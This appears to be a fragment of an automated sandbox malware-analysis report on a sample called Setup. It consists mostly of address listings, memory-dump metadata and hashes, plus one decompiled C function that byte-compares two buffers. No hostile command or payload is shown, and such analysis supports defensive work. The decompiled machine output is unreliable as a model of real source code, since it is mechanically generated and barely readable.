                                                                                                                                                                                              0x004065a0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004065a0
                                                                                                                                                                                              0x004064fe
                                                                                                                                                                                              0x00406500
                                                                                                                                                                                              0x00406517
                                                                                                                                                                                              0x0040651f
                                                                                                                                                                                              0x00406521
                                                                                                                                                                                              0x00406538
                                                                                                                                                                                              0x00406540
                                                                                                                                                                                              0x00406542
                                                                                                                                                                                              0x00406559
                                                                                                                                                                                              0x00406561
                                                                                                                                                                                              0x00406563
                                                                                                                                                                                              0x00406570
                                                                                                                                                                                              0x00406570
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406563
                                                                                                                                                                                              0x0040654f
                                                                                                                                                                                              0x00406553
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406553
                                                                                                                                                                                              0x0040652e
                                                                                                                                                                                              0x00406532
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406532
                                                                                                                                                                                              0x0040650d
                                                                                                                                                                                              0x00406511
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406511
                                                                                                                                                                                              0x0040646f
                                                                                                                                                                                              0x00406471
                                                                                                                                                                                              0x00406488
                                                                                                                                                                                              0x00406490
                                                                                                                                                                                              0x00406492
                                                                                                                                                                                              0x004064a9
                                                                                                                                                                                              0x004064b1
                                                                                                                                                                                              0x004064b3
                                                                                                                                                                                              0x004064ca
                                                                                                                                                                                              0x004064d2
                                                                                                                                                                                              0x004064d4
                                                                                                                                                                                              0x004064e1
                                                                                                                                                                                              0x004064e1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004064d4
                                                                                                                                                                                              0x004064c0
                                                                                                                                                                                              0x004064c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004064c4
                                                                                                                                                                                              0x0040649f
                                                                                                                                                                                              0x004064a3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004064a3
                                                                                                                                                                                              0x0040647e
                                                                                                                                                                                              0x00406482
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406482
                                                                                                                                                                                              0x004063e0
                                                                                                                                                                                              0x004063e2
                                                                                                                                                                                              0x004063f9
                                                                                                                                                                                              0x00406401
                                                                                                                                                                                              0x00406403
                                                                                                                                                                                              0x0040641a
                                                                                                                                                                                              0x00406422
                                                                                                                                                                                              0x00406424
                                                                                                                                                                                              0x0040643b
                                                                                                                                                                                              0x00406443
                                                                                                                                                                                              0x00406445
                                                                                                                                                                                              0x00406452
                                                                                                                                                                                              0x00406452
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406445
                                                                                                                                                                                              0x00406431
                                                                                                                                                                                              0x00406435
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406435
                                                                                                                                                                                              0x00406410
                                                                                                                                                                                              0x00406414
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406414
                                                                                                                                                                                              0x004063ef
                                                                                                                                                                                              0x004063f3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040634a
                                                                                                                                                                                              0x0040634a
                                                                                                                                                                                              0x0040634d
                                                                                                                                                                                              0x00406351
                                                                                                                                                                                              0x00406353
                                                                                                                                                                                              0x0040636a
                                                                                                                                                                                              0x0040636a
                                                                                                                                                                                              0x0040636e
                                                                                                                                                                                              0x00406372
                                                                                                                                                                                              0x00406374
                                                                                                                                                                                              0x0040638b
                                                                                                                                                                                              0x0040638b
                                                                                                                                                                                              0x0040638f
                                                                                                                                                                                              0x00406393
                                                                                                                                                                                              0x00406395
                                                                                                                                                                                              0x004063ac
                                                                                                                                                                                              0x004063ac
                                                                                                                                                                                              0x004063b0
                                                                                                                                                                                              0x004063b4
                                                                                                                                                                                              0x004063b6
                                                                                                                                                                                              0x004063bc
                                                                                                                                                                                              0x004063bf
                                                                                                                                                                                              0x004063c3
                                                                                                                                                                                              0x004063c3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004063b6
                                                                                                                                                                                              0x0040639b
                                                                                                                                                                                              0x0040639e
                                                                                                                                                                                              0x004063a2
                                                                                                                                                                                              0x004063a6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004063a6
                                                                                                                                                                                              0x0040637a
                                                                                                                                                                                              0x0040637d
                                                                                                                                                                                              0x00406381
                                                                                                                                                                                              0x00406385
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406385
                                                                                                                                                                                              0x00406359
                                                                                                                                                                                              0x0040635c
                                                                                                                                                                                              0x00406360
                                                                                                                                                                                              0x00406364
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406364
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                              • Instruction ID: 79d90c4c63edac05c960fdd57aea228f43303504b2914f2edca31e3e94018fe3
                                                                                                                                                                                              • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66D17D73C0A9B34AC739812D449822BEA62AFD165031FC3B2DCE63F3C9D23A6D1595D4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00405F36 Relevance: .4, Instructions: 361COMMONCrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00405F36(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                                                                                                                                                                                              0x00405f36
                                                                                                                                                                                              0x00405f36
                                                                                                                                                                                              0x00405f3c
                                                                                                                                                                                              0x00405fbb
                                                                                                                                                                                              0x00405fbd
                                                                                                                                                                                              0x00405fbf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405fc5
                                                                                                                                                                                              0x00405fcb
                                                                                                                                                                                              0x0040604a
                                                                                                                                                                                              0x0040604c
                                                                                                                                                                                              0x0040604e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406054
                                                                                                                                                                                              0x0040605a
                                                                                                                                                                                              0x004060d9
                                                                                                                                                                                              0x004060db
                                                                                                                                                                                              0x004060dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004060e3
                                                                                                                                                                                              0x004060e9
                                                                                                                                                                                              0x00406168
                                                                                                                                                                                              0x0040616a
                                                                                                                                                                                              0x0040616c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406172
                                                                                                                                                                                              0x00406178
                                                                                                                                                                                              0x004061f7
                                                                                                                                                                                              0x004061f9
                                                                                                                                                                                              0x004061fb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406207
                                                                                                                                                                                              0x00406287
                                                                                                                                                                                              0x00406289
                                                                                                                                                                                              0x0040628b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406291
                                                                                                                                                                                              0x00406297
                                                                                                                                                                                              0x00406316
                                                                                                                                                                                              0x00406318
                                                                                                                                                                                              0x0040631a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406328
                                                                                                                                                                                              0x0040632a
                                                                                                                                                                                              0x0040633b
                                                                                                                                                                                              0x0040633b
                                                                                                                                                                                              0x00405f30
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x004062a0
                                                                                                                                                                                              0x004062a2
                                                                                                                                                                                              0x004062b9
                                                                                                                                                                                              0x004062c1
                                                                                                                                                                                              0x004062c3
                                                                                                                                                                                              0x004062da
                                                                                                                                                                                              0x004062e2
                                                                                                                                                                                              0x004062e4
                                                                                                                                                                                              0x004062fb
                                                                                                                                                                                              0x00406303
                                                                                                                                                                                              0x00406305
                                                                                                                                                                                              0x00406312
                                                                                                                                                                                              0x00406312
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406305
                                                                                                                                                                                              0x004062f1
                                                                                                                                                                                              0x004062f5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004062f5
                                                                                                                                                                                              0x004062d0
                                                                                                                                                                                              0x004062d4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004062d4
                                                                                                                                                                                              0x004062af
                                                                                                                                                                                              0x004062b3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004062b3
                                                                                                                                                                                              0x00406211
                                                                                                                                                                                              0x00406213
                                                                                                                                                                                              0x0040622a
                                                                                                                                                                                              0x00406232
                                                                                                                                                                                              0x00406234
                                                                                                                                                                                              0x0040624b
                                                                                                                                                                                              0x00406253
                                                                                                                                                                                              0x00406255
                                                                                                                                                                                              0x0040626c
                                                                                                                                                                                              0x00406274
                                                                                                                                                                                              0x00406276
                                                                                                                                                                                              0x00406283
                                                                                                                                                                                              0x00406283
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406276
                                                                                                                                                                                              0x00406262
                                                                                                                                                                                              0x00406266
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406266
                                                                                                                                                                                              0x00406241
                                                                                                                                                                                              0x00406245
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406245
                                                                                                                                                                                              0x00406220
                                                                                                                                                                                              0x00406224
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406224
                                                                                                                                                                                              0x00406181
                                                                                                                                                                                              0x00406183
                                                                                                                                                                                              0x0040619a
                                                                                                                                                                                              0x004061a2
                                                                                                                                                                                              0x004061a4
                                                                                                                                                                                              0x004061bb
                                                                                                                                                                                              0x004061c3
                                                                                                                                                                                              0x004061c5
                                                                                                                                                                                              0x004061dc
                                                                                                                                                                                              0x004061e4
                                                                                                                                                                                              0x004061e6
                                                                                                                                                                                              0x004061f3
                                                                                                                                                                                              0x004061f3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004061e6
                                                                                                                                                                                              0x004061d2
                                                                                                                                                                                              0x004061d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004061d6
                                                                                                                                                                                              0x004061b1
                                                                                                                                                                                              0x004061b5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004061b5
                                                                                                                                                                                              0x00406190
                                                                                                                                                                                              0x00406194
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406194
                                                                                                                                                                                              0x004060f2
                                                                                                                                                                                              0x004060f4
                                                                                                                                                                                              0x0040610b
                                                                                                                                                                                              0x00406113
                                                                                                                                                                                              0x00406115
                                                                                                                                                                                              0x0040612c
                                                                                                                                                                                              0x00406134
                                                                                                                                                                                              0x00406136
                                                                                                                                                                                              0x0040614d
                                                                                                                                                                                              0x00406155
                                                                                                                                                                                              0x00406157
                                                                                                                                                                                              0x00406164
                                                                                                                                                                                              0x00406164
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406157
                                                                                                                                                                                              0x00406143
                                                                                                                                                                                              0x00406147
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406147
                                                                                                                                                                                              0x00406122
                                                                                                                                                                                              0x00406126
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406126
                                                                                                                                                                                              0x00406101
                                                                                                                                                                                              0x00406105
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406105
                                                                                                                                                                                              0x00406063
                                                                                                                                                                                              0x00406065
                                                                                                                                                                                              0x0040607c
                                                                                                                                                                                              0x00406084
                                                                                                                                                                                              0x00406086
                                                                                                                                                                                              0x0040609d
                                                                                                                                                                                              0x004060a5
                                                                                                                                                                                              0x004060a7
                                                                                                                                                                                              0x004060be
                                                                                                                                                                                              0x004060c6
                                                                                                                                                                                              0x004060c8
                                                                                                                                                                                              0x004060d5
                                                                                                                                                                                              0x004060d5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004060c8
                                                                                                                                                                                              0x004060b4
                                                                                                                                                                                              0x004060b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004060b8
                                                                                                                                                                                              0x00406093
                                                                                                                                                                                              0x00406097
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406097
                                                                                                                                                                                              0x00406072
                                                                                                                                                                                              0x00406076
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406076
                                                                                                                                                                                              0x00405fd4
                                                                                                                                                                                              0x00405fd6
                                                                                                                                                                                              0x00405fed
                                                                                                                                                                                              0x00405ff5
                                                                                                                                                                                              0x00405ff7
                                                                                                                                                                                              0x0040600e
                                                                                                                                                                                              0x00406016
                                                                                                                                                                                              0x00406018
                                                                                                                                                                                              0x0040602f
                                                                                                                                                                                              0x00406037
                                                                                                                                                                                              0x00406039
                                                                                                                                                                                              0x00406046
                                                                                                                                                                                              0x00406046
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406039
                                                                                                                                                                                              0x00406025
                                                                                                                                                                                              0x00406029
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406029
                                                                                                                                                                                              0x00406004
                                                                                                                                                                                              0x00406008
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406008
                                                                                                                                                                                              0x00405fe3
                                                                                                                                                                                              0x00405fe7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f3e
                                                                                                                                                                                              0x00405f3e
                                                                                                                                                                                              0x00405f41
                                                                                                                                                                                              0x00405f45
                                                                                                                                                                                              0x00405f47
                                                                                                                                                                                              0x00405f5e
                                                                                                                                                                                              0x00405f5e
                                                                                                                                                                                              0x00405f62
                                                                                                                                                                                              0x00405f66
                                                                                                                                                                                              0x00405f68
                                                                                                                                                                                              0x00405f7f
                                                                                                                                                                                              0x00405f7f
                                                                                                                                                                                              0x00405f83
                                                                                                                                                                                              0x00405f87
                                                                                                                                                                                              0x00405f89
                                                                                                                                                                                              0x00405fa0
                                                                                                                                                                                              0x00405fa0
                                                                                                                                                                                              0x00405fa4
                                                                                                                                                                                              0x00405fa8
                                                                                                                                                                                              0x00405faa
                                                                                                                                                                                              0x00405fb0
                                                                                                                                                                                              0x00405fb3
                                                                                                                                                                                              0x00405fb7
                                                                                                                                                                                              0x00405fb7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405faa
                                                                                                                                                                                              0x00405f8f
                                                                                                                                                                                              0x00405f92
                                                                                                                                                                                              0x00405f96
                                                                                                                                                                                              0x00405f9a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f9a
                                                                                                                                                                                              0x00405f6e
                                                                                                                                                                                              0x00405f71
                                                                                                                                                                                              0x00405f75
                                                                                                                                                                                              0x00405f79
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f79
                                                                                                                                                                                              0x00405f4d
                                                                                                                                                                                              0x00405f50
                                                                                                                                                                                              0x00405f54
                                                                                                                                                                                              0x00405f58
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405f58
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
